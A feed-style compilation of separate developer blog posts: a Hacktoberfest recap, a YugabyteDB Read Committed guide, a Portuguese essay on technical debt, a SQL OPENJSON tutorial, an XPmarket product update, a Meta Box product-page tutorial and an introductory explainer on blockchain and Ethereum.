You can see the progress report of your PRs by visiting [Hacktoberfest profile](https://hacktoberfest.com/profile/). Initially, the status of your PRs will be `0/4` and as you do more PRs, the status will change to `1/4`, `2/4` and so on. If you have done all 4 PR and kept doing more PRs, the status will look something like this - `4 + .. /4`. Currently, I have completed all 4 PRs and have done 1 more PRs. The status looks like this - `4 + 1 /4`.

## Dark mode
I haven't participated in Hacktoberfest before but I have heard that there were only white t-shirts available. This year, you can choose between a white or dark t-shirt.
## Dev badge
Dev has a special and unique-looking badge for every Hacktoberfest. Once you completed 4 PRs, you will be rewarded with a special badge along with this message.

The badge of this year looks fascinating -

## Holopin
I quite often enjoy messing with my [badge board](https://www.holopin.io/@batunpc) in [Holopin](https://www.holopin.io/), this board lets me pin my badges and present the Hacktoberfest achievements I have made. Holopin got introduced this year along with Hacktoberfest and if you had an account, you would get a unique badge for each PR you made. This was one of the encouraging factors for me to do more PRs.
The [badge board](https://www.holopin.io/@batunpc) looks like this -

You can adjust the badges by `Shift + Click` and `Drag` to move them around or `Command + Click` to rotate. They also provide a Markdown code to embed the badge board in your README.md file.
## palpatine
I have been developing a CLI tool called [palpatine](https://github.com/batunpc/palpatine) for a while now. It is a static site generator (SSG) written in C++ and still under development, ready for the support of the community in GitHub. This Hacktoberfest, I experienced the role of a contributor in open source but in the next Hacktoberfest, I will be participating as a maintainer of palpatine!
| batunpc |
1,236,964 | How to set Read Committed in YugabyteDB | YugabyteDB is PostgreSQL compatible, which means that it supports all transaction isolation level,... | 0 | 2022-10-31T13:25:30 | https://dev.to/yugabyte/how-to-set-read-committed-in-yugabytedb-2m6c | yugabytedb, postgres, isolation, sql | YugabyteDB is [PostgreSQL compatible] (https://www.yugabyte.com/tech/postgres-compatibility/), which means that it supports all transaction isolation level, with the same behavior. In previous versions, the **Read Committed** isolation level was mapped to the higher **Repeatable Read** level, and this is still the default in the current version (2.14). Here is an example where I start YugabyteDB with all default `tserver` flags:
```sh
docker run --rm yugabytedb/yugabyte:2.14.4.0-b26 bash -c '
yugabyted start --tserver_flags="" --listen 0.0.0.0
cat /root/var/logs/{master,tserver}.err
until postgres/bin/pg_isready ; do sleep 0.1 ; done | uniq &&
ysqlsh -e <<SQL
show yb_effective_transaction_isolation_level;
set default_transaction_isolation="read committed";
show yb_effective_transaction_isolation_level;
SQL
'
```
Here even when `read committed` is set at PostgreSQL level (the default), the `yb_effective_transaction_isolation_level` effective shows `repeatable read`. This read-only parameter was added to query easily the effective isolation level:
```sql
Starting yugabyted...
server_version
---------------------
11.2-YB-2.14.4.0-b0
(1 row)
show yb_effective_transaction_isolation_level;
yb_effective_transaction_isolation_level
------------------------------------------
repeatable read
(1 row)
set default_transaction_isolation="read committed";
SET
show yb_effective_transaction_isolation_level;
yb_effective_transaction_isolation_level
------------------------------------------
repeatable read
(1 row)
```
However, when enabling the true Read Committed semantic, with the `yb_enable_read_committed_isolation` flag when starting the `tserver`:
```sh
docker run --rm yugabytedb/yugabyte:2.14.4.0-b26 bash -c '
yugabyted start --tserver_flags="yb_enable_read_committed_isolation=true"
cat /root/var/logs/{master,tserver}.err
until ysqlsh -c "show server_version" ; do sleep 1 ; done 2>/dev/null
ysqlsh -e <<SQL
show yb_effective_transaction_isolation_level;
set default_transaction_isolation="read committed";
show yb_effective_transaction_isolation_level;
SQL
'
```
The effective isolation level is Read Committed:
```sql
Starting yugabyted...
server_version
---------------------
11.2-YB-2.14.4.0-b0
(1 row)
show yb_effective_transaction_isolation_level;
yb_effective_transaction_isolation_level
------------------------------------------
read committed
(1 row)
set default_transaction_isolation="read committed";
SET
show yb_effective_transaction_isolation_level;
yb_effective_transaction_isolation_level
------------------------------------------
read committed
(1 row)
```
When you are porting an application written for PostgreSQL, you probably want this because Read Committed is the only isolation level that doesn't require a retry logic for serializable errors. This is also why the databases who do not support this level, saying that higher isolation is better, are not PostgreSQL compatible: porting an application to it would require many changes in application design and code.
Why isn't `yb_enable_read_committed_isolation=true` the default? The reason is backward compatibility, because this was implemented recently, but there are good chances that it become the default soon. The commands in this blog post can help you do know exactly which is the effective isolation level for a specific version.
| franckpachot |
1,236,988 | Divida técnica: O bureau de crédito da TI | É comum falar que qualidade do código gerado pelo time de desenvolvimento pode gerar perdas... | 0 | 2022-10-31T15:39:14 | https://dev.to/juscelior/divida-tecnica-o-bureau-de-credito-da-ti-8hc | É comum falar que qualidade do código gerado pelo time de desenvolvimento pode gerar perdas financeiras, afinal qual o impacto financeiro em deixar de corrigir um bug no software da empresa? Vou gastar mais dinheiro para corrigir esse bug?
<img width="100%" style="width:100%" src="https://media.giphy.com/media/WPtzThAErhBG5oXLeS/giphy.gif">
Conseguir mensurar todas as possibilidades é uma tarefa complexa e ouso afirmar que não existe um método para garantir com exatidão (exceto para o Doutor Estranho), precisamos sempre trabalhar com possibilidades. Porem é possível olhar para trás e perceber que algumas decisões foram ruins e provocaram algum prejuízo financeiro. O caso mais ilustre é o erro de 1 bilhão de dólares:
## O erro de 1 bilhão de dólares
[Tony Hoare](https://en.wikipedia.org/wiki/Tony_Hoare): O criador do algoritmo [_QuickSort_](https://pt.wikipedia.org/wiki/Quicksort) e também vencedor do [Prêmio Turing](https://pt.wikipedia.org/wiki/Pr%C3%AAmio_Turing) (o Prêmio Nobel de Computação) acrescentou uma funcionalidade simples na linguagem [Algol](https://pt.wikipedia.org/wiki/ALGOL) com o intuito de melhorar a performance das aplicações escritas nessa linguagem, o motivo fazia total sentido na época porque parecia prático e fácil de fazer. Várias décadas depois, ele mostrou seu arrependimento em uma conferencia:
> Eu o chamo de meu erro de um bilhão de dólares... Naquela época, eu estava projetando o primeiro sistema de tipo abrangente para referências em uma linguagem orientada a objetos. Meu objetivo era garantir que todo o uso de referências fosse absolutamente seguro, com verificação realizada automaticamente pelo compilador.
> Mas não consegui resistir à tentação de colocar uma referência nula, simplesmente porque era muito fácil de implementar. Isto levou a inúmeros erros, vulnerabilidades e falhas de sistema, que provavelmente causaram um bilhão de dólares de dor e danos nos últimos quarenta anos.
> – [Tony Hoare](https://en.wikipedia.org/wiki/Tony_Hoare), inventor of ALGOL W.
Versão original:
> I call it my billion-dollar mistake…At that time, I was designing the first comprehensive type system for references in an object-oriented language. My goal was to ensure that all use of references should be absolutely safe, with checking performed automatically by the compiler.
> But I couldn’t resist the temptation to put in a null reference, simply because it was so easy to implement. This has led to innumerable errors, vulnerabilities, and system crashes, which have probably caused a billion dollars of pain and damage in the last forty years.
> – [Tony Hoare](https://en.wikipedia.org/wiki/Tony_Hoare), inventor of ALGOL W.
Pode encontrar nesse [link](https://www.infoq.com/presentations/Null-References-The-Billion-Dollar-Mistake-Tony-Hoare/) o vídeo completo dessa conferencia.
## Impactos da divida técnica
Você acredita que uma dívida técnica possui impacto que vai além do desperdício financeiro?
Vamos imaginar essa divida técnica como sendo uma operação de crédito financeiro, e o nome Divida técnica como sendo a medida que o bureau de crédito da TI utiliza para controlar seu cadastro. Se não pagamos essa divida em dia, podemos ter nosso nome inscrito em um cadastro e como consequência sofrer limitações futuras.
> O serviço de proteção ao crédito, ou bureau de crédito, é um serviço de informações de crédito, que utiliza informações de adimplência e inadimplência de pessoas físicas ou jurídicas para fins de decisão sobre crédito.
Se você já teve nome sujo, bancos podem negar crédito para o resto da vida. Agora o mesmo pode acontecer com o não gerenciamento da dívida técnica. Como consequência, a velocidade de entrega do time é limitada. É possível contratar mais profissionais para fazer o mesmo trabalho. Em resumo, gastamos mais recursos financeiros para entregar menos funcionalidades. Duvida?

A lei de Brooks é uma observação sobre gerenciamento de projetos de software, segundo a qual adicionar mão de obra ao projeto de software que está atrasado o atrasa ainda mais. Foi cunhado por [Fred Brooks](https://en.wikipedia.org/wiki/Fred_Brooks) em seu livro de 1975 [O mítico homem-mês: ensaios sobre engenharia de software](https://www.amazon.com.br/m%C3%ADtico-homem-m%C3%AAs-ensaios-engenharia-software/dp/8550802530/).

Se não é simples correlacionar o impacto financeiro com o bug, podemos analisar o impacto da dívida técnica na produtividade desses times. Pesquisas recentes sugerem que a empresa média perde 23-42% do tempo dos desenvolvedores devido a dívidas técnicas e código ruim em geral [1](https://dl.acm.org/doi/abs/10.1145/3524843.3528091). Outro dado interessante é que os desenvolvedores de software são frequentemente "forçados" a introduzir novas dividas técnicas à medida que as empresas mantêm a qualidade do código comercial para ganhos a curto prazo, como novas funcionalidades [2](https://research.chalmers.se/publication/511450/file/511450_Fulltext.pdf).
A dívida técnica afeta tanto a felicidade dos desenvolvedores quanto a sua satisfação no trabalho [3](https://arxiv.org/abs/1904.08239). Nem sempre um profissional larga a empresa por motivos financeiros, existem outros fatores que precisam ser considerados. Além de perder um recurso, perde o conhecimento desse profissional, como mensurar o impacto financeiro dessa perda?
## Por que isso acontece?
Em mais de 13 anos de experiencia consigo listar essas desculpas como sendo as mais comuns:
> Não temos tempo para testar essa alteração, vamos colocar em produção e assim vamos monitorar o ambiente para saber o que vai acontecer.
> Existe um processo de gestão de mudança (GMUD), mas ele é tão complicado que se for seguido a próxima janela de implementação é só daqui 2 meses, e o cliente precisa dessa funcionalidade agora.
> O nosso ambiente de teste não esta atualizado ou não esta pronto. Isso quando não existe a resposta: o ambiente de teste é em produção (junto com nossos clientes).
Recomendo a leitura do livro [O projeto fênix: um romance sobre TI, DevOps e sobre ajudar o seu negócio a vencer](https://www.amazon.com.br/projeto-f%C3%AAnix-Gene-Kim/dp/8550801895), esse livro não possui uma linguagem excludente, vulgo _techniques_, se trata de uma novela da área de TI. Um pouco da historia: O time de Operações de TI é olhado por todos como causadores de problemas, além de estarem sempre atrapalhando o andamento do Projeto Fênix, cujo objetivo é salvar a empresa. Como consequência não é possível alocar as pessoas certas da empresa em projetos estratégicos pois precisam apagar focos de incêndio, soa familiar?

## O papel da governança
Um estudo do [IDC](https://www.idc.com/research/viewtoc.jsp?containerId=US44640719) previu em 2019 que em 2022, 90% dos Novos Serviços Digitais serão construídos como aplicações compostas usando serviços públicos e internos fornecidos por API; Metade desses serviços irá alavancar a IA e o aprendizado de máquinas.
Se um desses serviços está com uma dívida muito alta pode criar um efeito cascata e prejudicar outros serviços. Seria algo assim...
<img width="100%" style="width:100%" src="https://media.giphy.com/media/URqZ9jDNRfunXPvVhE/giphy.gif">
Bem, importância de uma base de código saudável é amplamente subvalorizada no nível empresarial: mais de 90% dos gerentes de TI carecem de processos e estratégias para o gerenciamento da dívida técnica [4](https://www.infoq.com/articles/business-impact-code-quality/).
Agora para ter uma organização de alto desempenho, precisamos ser sensíveis às necessidades dos clientes, agir com base em feedback e continuar a inovar se quisermos permanecer relevantes no mercado. E precisamos fazer isso durante ciclos de produtos cada vez mais curtos. E para gerenciar essa dívida técnica é necessário uma área especializada e dedicada para fomentar estratégia focando nos processos, programa e pessoas capacitadas.
| juscelior | |
1,237,631 | How to import json to SQL | How to import json to SQL | 0 | 2022-10-31T21:24:57 | https://dev.to/campelo/how-to-import-json-to-sql-bcj | json, sql, import, openjson | ---
title: How to import json to SQL
published: true
description: How to import json to SQL
tags: 'json, sql, import, openjson'
cover_image: 'https://raw.githubusercontent.com/campelo/documentation/master/posts/sql/assets/cover.png'
canonical_url: null
id: 1237631
---
###### :postbox: Contact :brazil: :us: :fr:
[Twitter](https://twitter.com/campelo87)
[LinkedIn](https://www.linkedin.com/in/flavio-campelo/?locale=en_US)
---
## Declaring a variable with json content
Json content:
```json
[
{
"name": "Flavio",
"code": "FLA-1",
"isDeleted": false
},
{
"name": "Contoso",
"code": "CON-1",
"isDeleted": true
}
]
```
```sql
-- SET JSON CONTENT TO A VARIABLE (@JSON)...
DECLARE @json NVARCHAR(max) = N'[
{
"name": "Flavio",
"code": "FLA-1",
"isDeleted": false
},
{
"name": "Contoso",
"code": "CON-1",
"isDeleted": true
}
]';
```
## Fill a temp table with json content
```sql
-- FILL #TEMP TABLE WITH JSON CONTENT...
SELECT firstName, code, IIF(isDeleted = 1, 0, 1) as active
INTO #temp
FROM OPENJSON(@json)
WITH (
firstName VARCHAR(50) '$.name',
code VARCHAR(10) '$.code',
isDeleted BIT '$.isDeleted'
);
```
## Show items from temp table
```sql
-- SHOW ITEMS FROM #TEMP TABLE
SELECT * FROM #temp;
```

## If you need to drop temp table
```sql
-- REMOVE A #TEMP TABLE...
DROP TABLE #temp;
```
## Typos or suggestions?
If you've found a typo, a sentence that could be improved or anything else that should be updated on this blog post, you can access it through a git repository and make a pull request. If you feel comfortable with github, instead of posting a comment, please go directly to https://github.com/campelo/documentation and open a new pull request with your changes.
| campelo |
1,237,737 | XPmarket Dev Update - October | Hey there! This has been an exciting month and our team is still burning the candle and both ends.... | 0 | 2022-11-01T13:30:00 | https://dev.to/xpmarket/xpmarket-dev-update-october-40k4 | xrpl, nft, dex, web3 | Hey there!
This has been an exciting month and our team is still burning the candle and both ends. As you may know, the XLS-20d(NFT update on XRPL) is live now! This has changed our plans and we are going to roll out a very fascinating and versatile solution for NFTs, but as you know, we like to write about what we have done rather than making promises. There were also a lot of interesting events and private meetings with remarkable people. Let’s get started!
#Development
##Swap
Since the launch of our Swap functionality we received an incredible amount of positive feedback, especially about how this feature is integrated into each token’s page. We keep improving every aspect of what we have already released and Swaps is not an exception.
We have added “Price impact” to inform our users on how their order will affect the price. This element allows traders to estimate how much liquidity is present for the given trading pair and hence make an informed decision on what amount of tokens can be swapped without significant consequences.
How does it work exactly? Swap feature does not operate as on a traditional AMM, as it is not implemented on XRPL yet. This means there always will be a spread between buy and sell orders. Hence, price impact starts the calculation from the first order you fill, rather than from the current price. So if you are buying a token, the price impact calculation will start from the first bid order, and if you are selling, then from the first ask order.
🔗 https://xpmarket.com/swap

P.S. As this is very sensitive information, we have made the text smaller in order to get feedback from our hard users. We will soon consider the beta testing to be finished and it will be more noticeable.
##Global Search
This is by far the most significant improvement we have introduced in the recent update, as it significantly boosts user experience and navigation speed. Now straight from the home page you can enter the token’s name/ticker and it will be shown in the list. All you have to do is just click on it! In addition to directing users to the token page only, we are showing whether the token is also available on the DEX. This means you can find almost all tokens straight away from a single place, no matter whether this is a profile page or DEX.

There are some exclusion rules, however. If a token has zero market cap and no twitter account, it will be excluded from the search. We are still testing the algorithms to cut off dead projects, hence this threshold might change in future.
##XRPL Statistics
Whether you are a developer, statistician, or just curious, there is a statistics page where you can retrospectively track the development of XRPL’s ecosystem. We provide access to historic data on the number of trustlines, volumes (DEX, CEX, and total), and market cap.
This month we have changed the rules on how the total market cap is calculated. Due to a set of technical limitations and the complexity of such calculations, total market cap is a sum of Top 100 projects capitalisation. While it excludes a lot of tokens, it reflects the actual value with a 97-98% accuracy.
🔗 https://xpmarket.com/xrpl-statistics

##New DEX Layout
We have updated DEX layout both on Mobile and Desktop versions. Now it is much more convenient, as all elements are within reach and sight. We have also made a few smaller changes that might not be noticeable at first, but help with overall experience.

##Seedling IDO
Our partners at Seedling.cm have conducted an exclusive IDO of our native token. The event was a huge success, as the whole allocation was sold out in less than 7 minutes. Do not worry if you were unable to participate, as the allocation was small and the number of participants was limited. There will be an opportunity for everyone in future.
This is an extra step into XRPL’s popularisation within the wider blockchain community!
#Operations
##Web summit
We are attending a Web Summit in Lisbon, Portugal. The event takes place from 1-4 November. We will have a booth showcasing our vision, achievements, and future plans. If you are around, you can find us on 2 November at A215.
##Partnerships
We are happy to announce that 32ventures joined XPmarket as an investor and partner. We are going to work together on expanding XRPL ecosystem and improving XPmarket.
##We are hiring!
We are looking for people who can help us with quality assurance. Our community has been working on this for a long time, but we would like to do a more thorough testing before releasing the results into production. If you know a good QA specialist who is skilled at XRPL we would be very grateful for recommendations.
Thank you for reading and supporting us. We are very happy to see the start of this journey. As always, I am ready to answer all your questions, so I look forward to hearing from you.
| outrum |
1,237,941 | How to Create a Product Page - P5 - Using Meta Box and Gutenberg | To continue the series about creating a product page, we have a new way to do it using MB Views only.... | 19,769 | 2022-11-01T02:14:23 | https://metabox.io/create-product-page-p5-meta-box-gutenberg/ | tutorial, customfields, gutenberg, productpage | To continue the series about creating a product page, we have a new way to do it using MB Views only. It's a Meta Box's extension. If you are using a theme without any page builders or just using only Gutenberg, this tutorial will work.
As in the previous part of this series, I also take a detailed page about car rental as an example.

Video Version
-------------
https://youtu.be/DnKcWGkyhEQ
Before Getting Started
----------------------
The product is a kind of custom post type. In this case, each car for rent will be a post in that post type. The product's name and its descriptions are the title and content of the post. We'll need some extra information about the cars such as price, image gallery, type of fuel, etc. So, we use custom fields to save that data.

To create custom post types and custom fields, we use the [Meta Box core plugin](https://wordpress.org/plugins/meta-box/). It's free and available on [wordpress.org.](https://wordpress.org/plugins/meta-box/)
For more advanced features, we also need some Meta Box extensions. You can use **Meta Box AIO** or install the following extensions individually:
- [MB Custom Post Type](https://metabox.io/plugins/custom-post-type/): to create custom post types;
- [Meta Box Builder](https://metabox.io/plugins/meta-box-builder/): to have a UI on the back end to create custom fields easily;
- [MB Views](https://metabox.io/plugins/mb-views/): to create a template for the product page without touching the theme file.
Step 1: Create a New Custom Post Type
-------------------------------------
Go to **Meta Box** > **Post Types** > **New Post Type** to create a new custom post type.

Step 2: Create Custom Fields
----------------------------
Go to **Meta Box** > **Custom Fields**, then create fields as you want.

In this tutorial, I just take a typical example of car rental with some common fields. They are all very simple and don't require any particular setting. Here are the fields that I created.

Next, move to the **Settings** tab > **Location** > choose **Post Type** as **Car Rental** to apply these fields to this post type.

In the post editor, you will see all of the newly created custom fields.

Step 3: Create a Template
-------------------------
To display the product's details, you normally have to go to the theme's files to add code or use a page builder. However, you have another way with the **MB Views** extension to create templates without touching the theme's files.
Go to **Meta Box** > **Views** to create a new template. Instead of typing code into the box in the **Template** tab, you can insert fields to get their data.

Just click the **Insert Field** button and choose which one you want.
First, I'll create a slider with many product images, so insert the **Gallery** field and choose an image size for it.

Next, insert the product name and its description. They are the default fields of WordPress.
In terms of the fuel, door, and gearbox information, because they are **select** fields, you'll have a setting where you can choose the output of the options as **Value** or **Label**.

Moving on, I'll insert the remaining fields as usual.

In the **Settings** section of the view, set the **Type** section as **Singular** to assign this template to a single post page. Then, add a rule in the **Location** section to apply it to the Car Rental page only.

Now, go to the product page, all the product information is displayed already.

It is so messy now. We'll need some JS and CSS to make it more beautiful with a better layout.
Step 4: Style the Page
----------------------
Before styling, let's add some **div** tags to separate the page into different sections for easier styling.

Next, go to the CSS tab, add some code.

Also add some code in the JavaScript tab. This is to create a slider for the gallery.

All of these codes are available on [Github](https://github.com/wpmetabox/tutorials/tree/master/create-a-product-page-with-MB-Views), you can refer to it.
After updating the template, you'll see the new look of the page on the frontend.

Last Words
----------
Hopefully, all the following steps above could 'help you a hand' in creating an advanced product page. In case, you plan to build your own product page using other page builders besides Gutenberg, there are some interesting options for you [here](https://metabox.io/series/product-page/). Keep track and send us your ideas if you wish for more tutorials. Good fortune! | wpmetabox |
1,272,822 | Blockchain Technology | Blockchain Technology By Lebohang Bernard Motseki | Email: lbmotseki@gmail.com Introduction As... | 0 | 2022-11-25T20:32:59 | https://dev.to/motseki/blockchain-technology-13o0 | Blockchain Technology
By Lebohang Bernard Motseki | Email: lbmotseki@gmail.com
Introduction
As blockchain continues to grow and become more user-friendly, the obligation is on individual to learn this evolving technology to prepare for the future. If you are new to blockchain, then this is the right place to gain solid foundational knowledge. In this article, you learn how to answer the question, “what is blockchain technology?” You’ll also learn how blockchain works, why it’s important, and how you can use this field to advance your career. Blockchain applications go far beyond cryptocurrency and bitcoin. With its ability to create more transparency and fairness while also saving businesses time and money, the technology is impacting a variety of sectors in ways that range from how contracts are enforced to making government work more efficiently.
What Is Blockchain Technology?
Blockchain is a method of recording information that makes it impossible or difficult for the system to be changed, hacked, or manipulated. It is a distributed ledger that duplicates and distributes transactions across the network of computers participating in the blockchain. Blockchain technology is a structure that stores transactional records, also known as the block, of the public in several databases, known as the “chain,” in a network connected through peer-to-peer nodes. Typically, this storage is referred to as a ‘digital ledger. Every transaction in this ledger is authorized by the digital signature of the owner, which authenticates the transaction and safeguards it from tampering. Hence, the information the digital ledger contains is highly secure.
Types of Blockchain
There are four different types of blockchains. They are as follows:
Private Blockchain Networks
Private blockchains operate on closed networks, and tend to work well for private businesses and organizations. Companies can use private blockchains to customize their accessibility and authorization preferences, parameters to the network, and other important security options. Only one authority manages a private blockchain network.
Public Blockchain Networks
Bitcoin and other cryptocurrencies originated from public blockchains, which also played a role in popularizing distributed ledger technology (DLT). Public blockchains also help to eliminate certain challenges and issues, such as security flaws and centralization. With DLT, data is distributed across a peer-to-peer network, rather than being stored in a single location. A consensus algorithm is used for verifying information authenticity; proof of stake (PoS) and proof of work (PoW) are two frequently used consensus methods.
Permissioned Blockchain Networks
Also sometimes known as hybrid blockchains, permissioned blockchain networks are private blockchains that allow special access for authorized individuals. Organizations typically set up these types of blockchains to get the best of both worlds, and it enables better structure when assigning who can participate in the network and in what transactions.
Consortium Blockchains
Similar to permissioned blockchains, consortium blockchains have both public and private components, except multiple organizations will manage a single consortium blockchain network. Although these types of blockchains can initially be more complex to set up, once they are running, they can offer better security. Additionally, consortium blockchains are optimal for collaboration with multiple organizations.
Why is Blockchain Popular?
Suppose you are transferring money to your family or friends from your bank account. You would log in to online banking and transfer the amount to the other person using their account number. When the transaction is done, your bank updates the transaction records. It seems simple enough, right? There is a potential issue which most of us neglect.
These types of transactions can be tampered with very quickly. People who are familiar with this truth are often wary of using these types of transactions, hence the evolution of third-party payment applications in recent years. But this vulnerability is essentially why Blockchain technology was created. Technologically, Blockchain is a digital ledger that is gaining a lot of attention and traction recently. But why has it become so popular? Well, let’s dig into it to fathom the whole concept.
Record keeping of data and transactions are a crucial part of the business. Often, this information is handled in house or passed through a third party like brokers, bankers, or lawyers increasing time, cost, or both on the business. Fortunately, Blockchain avoids this long process and facilitates the faster movement of the transaction, thereby saving both time and money.
Most people assume Blockchain and Bitcoin can be used interchangeably, but in reality, that’s not the case. Blockchain is the technology capable of supporting various applications related to multiple industries like finance, supply chain, manufacturing, etc., but Bitcoin is a currency that relies on Blockchain technology to be secure.
What Is a Blockchain Platform?
While a blockchain network describes the distributed ledger infrastructure, a blockchain platform describes a medium where users can interact with a blockchain and its network. Blockchain platforms are created to be scalable and act as extensions from an existing blockchain infrastructure, allowing information exchange and services to be powered directly from this framework. An example of a blockchain platform includes Ethereum, a software platform which houses the Etherium, or ether, cryptocurrency. With the Ethereum platform, users can also create programmable tokens and smart contracts which are built directly upon the Ethereum blockchain infrastructure.
What is Ethereum?
Ethereum is an open source, distributed software platform based on blockchain technology. It is a decentralized open-source platform based on blockchain domain, used to run smart contracts i.e. applications that execute the program exactly as it was programmed without the possibility of any fraud, interference from a third party, censorship, or downtime. It serves a platform for nearly 2,60,000 different cryptocurrencies. It has its own native cryptocurrency called Ether and a programming language called Solidity. Ether is a cryptocurrency generated by ethereum miners, used to reward for the computations performed to secure the blockchain. Ethereum is Bitcoin's main competitor. Ethereum enables developers to build decentralized applications. Miners produce Ether tokens that can be used as a currency and to pay for usage fees on the Ethereum network.
It is an open-source blockchain platform that offers smart contract facilities, which are a type of digital contract. Solidity was first introduced as a new type of programing language for the Ethereum platform. Developers use the Solidity programming language to develop smart contracts. Using Solidity, you can program the contracts to do any type of task. Cryptocurrency researcher Vitalik Buterin first described Ethereum in a proposal in 2013 that suggested the addition of a scripting language for programming to Bitcoin. Ethereum's development was funded by an online crowdsale, which is crowdfunding done through issuing cryptocurrency tokens, and the project came online on July 30, 2015.
Ethereum Virtual Machine (EVM)
Ethereum Virtual Machine abbreviated as EVM is a runtime environment for executing smart contracts in ethereum. It focuses widely on providing security and execution of untrusted code using an international network of public nodes. EVM is specialized to prevent Denial-of-service attack and confirms that the program does not have any access to each other’s state, also ensures that the communication is established without any potential interference.
How does Ethereum work?
Ethereum uses a blockchain network. The network is made up of nodes computers of volunteers who mine for the coin. The nodes produce the Ether tokens, and mining creates the cryptography upon which the currency is based. Because mining is a demanding use of a computer's resources, miners are rewarded with Ether. The Ethereum platform offers the computationally complete Ethereum Virtual Machine (EVM). EVM executes scripts worldwide across its network of distributed public nodes. These nodes provide the processing power for decentralized applications developers create to run on the network. Developers may buy Ether to pay for the use of the network, or they can mine for the tokens themselves, becoming a part of the network. An internal mechanism called Gas sets the pricing of transactions on the network.
What is Smart Contract?
Smart contracts are high-level program codes that are compiled to EVM byte code and deployed to the ethereum blockchain for further execution. It allows us to perform credible transactions without any interference of the third party, these transactions are trackable and irreversible. Languages used to write smart contracts are Solidity (a language library with similarities to C and JavaScript), Serpent (similar to Python, but deprecated), LLL (a low-level Lisp-like language), and Mutan (Go-based, but deprecated). Smart contracts are carried across the network in the same blockchain that records the ledger of transactions for the Ether cryptocurrency. These digital contracts can have conditions that run on scripts until fulfilled. Ethereum has built-in mechanisms to detect when an agreement is not met. Smart contracts can be used to exchange things such as properties, money and stocks on the back of an Ether token.
From the time of Ethereum's creation in July 2015 until Sept. 15, 2022, Ethereum used the Proof of Work (PoW) model to execute and verify transactions with the cryptocurrency, using the Ethereum Mainnet blockchain. Proof of Work is a type of consensus algorithm that is used for verification and data integrity. On Sept. 15, 2022, the Ethereum community completed what is known as "The Merge" with a transition to a Proof of Stake (PoS) consensus algorithm running on the Beacon Chain. For Ethereum and its users the benefit of moving to Proof of Stake (PoS), include potentially faster transaction speeds, while using less overall energy to process and validate transactions.
Ethereum and Ether: What is the difference?
Ethereum is a blockchain-based network. It is a platform that developers can use to build applications and program the smart contracts on which virtual currency is based. Like blockchain, it can be used for many different types of applications, including a number of financial uses. Ether (ETH) is Ethereum's native cryptocurrency. It is bought and sold using the Ethereum platform. It is one of many cryptocurrencies that can be traded using the Ethereum network. It is also used to reward miners when they add blocks to a blockchain. Ether supports the Ethereum network; it pays for computational services and applications built on the platform. It is described as the fuel that Ethereum runs on.
The Process of Transaction
One of Blockchain technology’s cardinal features is the way it confirms and authorizes transactions. For example, if two individuals wish to perform a transaction with a private and public key, respectively, the first person party would attach the transaction information to the public key of the second party. This total information is gathered together into a block.
The block contains a digital signature, a timestamp, and other important, relevant information. It should be noted that the block doesn’t include the identities of the individuals involved in the transaction. This block is then transmitted across all of the network's nodes, and when the right individual uses his private key and matches it with the block, the transaction gets completed successfully.
In addition to conducting financial transactions, the Blockchain can also hold transactional details of properties, vehicles, etc.
Here’s a use case that illustrates how Blockchain works:
• Hash Encryptions
blockchain technology uses hashing and encryption to secure the data, relying mainly on the SHA256 algorithm to secure the information. The address of the sender (public key), the receiver’s address, the transaction, and his/her private key details are transmitted via the SHA256 algorithm. The encrypted information, called hash encryption, is transmitted across the world and added to the blockchain after verification. The SHA256 algorithm makes it almost impossible to hack the hash encryption, which in turn simplifies the sender and receiver’s authentication.
• Proof of Work
In a Blockchain, each block consists of 4 main headers.
• Previous Hash: This hash address locates the previous block.
• Transaction Details: Details of all the transactions that need to occur.
• Nonce: An arbitrary number given in cryptography to differentiate the block’s hash address.
• Hash Address of the Block: All of the above (i.e., preceding hash, transaction details, and nonce) are transmitted through a hashing algorithm. This gives an output containing a 256-bit, 64 character length value, which is called the unique ‘hash address.’ Consequently, it is referred to as the hash of the block.
• Numerous people around the world try to figure out the right hash value to meet a pre-determined condition using computational algorithms. The transaction completes when the predetermined condition is met. To put it more plainly, Blockchain miners attempt to solve a mathematical puzzle, which is referred to as a proof of work problem. Whoever solves it first gets a reward.
• Mining
In Blockchain technology, the process of adding transactional details to the present digital/public ledger is called ‘mining.’ Though the term is associated with Bitcoin, it is used to refer to other Blockchain technologies as well. Mining involves generating the hash of a block transaction, which is tough to forge, thereby ensuring the safety of the entire Blockchain without needing a central system.
What Is a Miner in Blockchain?
Miners create new blocks on the chain through a process called mining. In a blockchain every block has its own unique nonce and hash, but also references the hash of the previous block in the chain, so mining a block isn't easy, especially on large chains. Miners use special software to solve the incredibly complex math problem of finding a nonce that generates an accepted hash. Because the nonce is only 32 bits and the hash is 256, there are roughly four billion possible nonce-hash combinations that must be mined before the right one is found. When that happens miners are said to have found the "golden nonce" and their block is added to the chain.
Blockchain is an emerging technology with many advantages in an increasingly digital world:
The advantages of Blockchain technology outweigh the regulatory issues and technical challenges. One key emerging use case of blockchain technology involves “smart contracts”. Smart contracts are basically computer programs that can automatically execute the terms of a contract. When a pre-configured condition in a smart contract among participating entities is met then the parties involved in a contractual agreement can be automatically made payments as per the contract in a transparent manner. Smart Propertyis another related concept which is regarding controlling the ownership of a property or asset via blockchain using Smart Contracts. The property can be physical such as car, house, smartphone etc. or it can be non-physical such as shares of a company. It should be noted here that even Bitcoin is not really a currency--Bitcoin is all about controlling the ownership of money. Blockchain technology is finding applications in wide range of areas—both financialand non-financial. Financialinstitutions and banks no longer see blockchain technology as threat to traditional business models. The world’s biggest banks are in fact looking for opportunities in this area by doing research on innovative blockchain applications. In a recent interview Rain Lohmus of Estonia’s LHV bank told that they found Blockchain to be the most tested and secure for some banking and finance related applications. Non-Financialapplications opportunities are also endless. We can envision putting proof of existence of all legal documents, health records, and loyalty payments in the music industry, notary, private securities and marriage licenses in the blockchain. By storing the fingerprint of the digital asset instead of storing the digital asset itself, the anonymity or privacy objective can be achieved.
• Highly Secure
It uses a digital signature feature to conduct fraud-free transactions making it impossible to corrupt or change the data of an individual by the other users without a specific digital signature.
• Decentralized System
Conventionally, you need the approval of regulatory authorities like a government or bank for transactions; however, with Blockchain, transactions are done with the mutual consensus of users resulting in smoother, safer, and faster transactions.
• Automation Capability
It is programmable and can generate systematic actions, events, and payments automatically when the criteria of the trigger are met.
Disadvantages
Blockchain and cryptography involves the use of public and private keys, and reportedly, there have been problems with private keys. If a user loses their private key, they face numerous challenges, making this one disadvantage of blockchains. Another disadvantage is the scalability restrictions, as the number of transactions per node is limited. Because of this, it can take several hours to finish multiple transactions and other tasks. It can also be difficult to change or add information after it is recorded, which is another significant disadvantage of blockchain.
Blockchain in Money Transfer
